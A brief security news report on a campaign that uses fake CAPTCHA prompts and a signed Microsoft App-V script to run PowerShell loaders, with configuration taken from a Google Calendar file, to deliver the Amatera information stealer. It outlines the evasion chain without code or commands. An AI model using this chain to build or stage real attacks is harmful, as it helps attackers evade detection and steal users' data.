CYBERSECURITY researchers have detailed a new campaign that blends ClickFix-style fake CAPTCHAs with a signed Microsoft App-V script to deliver an information stealer called Amatera. The attackers proxy PowerShell execution through a trusted Microsoft component by abusing SyncAppvPublishingServer[.]vbs, a signed Visual Basic Script, effectively living off the land to evade detection.
The infection chain starts with a fake CAPTCHA prompt that tricks users into running a malicious command, then uses an in-memory PowerShell loader that fetches configuration from a Google Calendar ICS file and proceeds through multiple loader stages to decrypt and run a PowerShell payload before launching the Amatera Stealer.
Researchers note the approach is highly evasive, chaining stages so execution progresses only as intended, and externalising configuration via a public calendar enables rapid rotation of infrastructure. The campaign forms part of the broader ClickFix ecosystem, which Microsoft has observed accounting for 47% of attacks, with attackers also leveraging trusted tools and third‑party services to hinder automated analysis.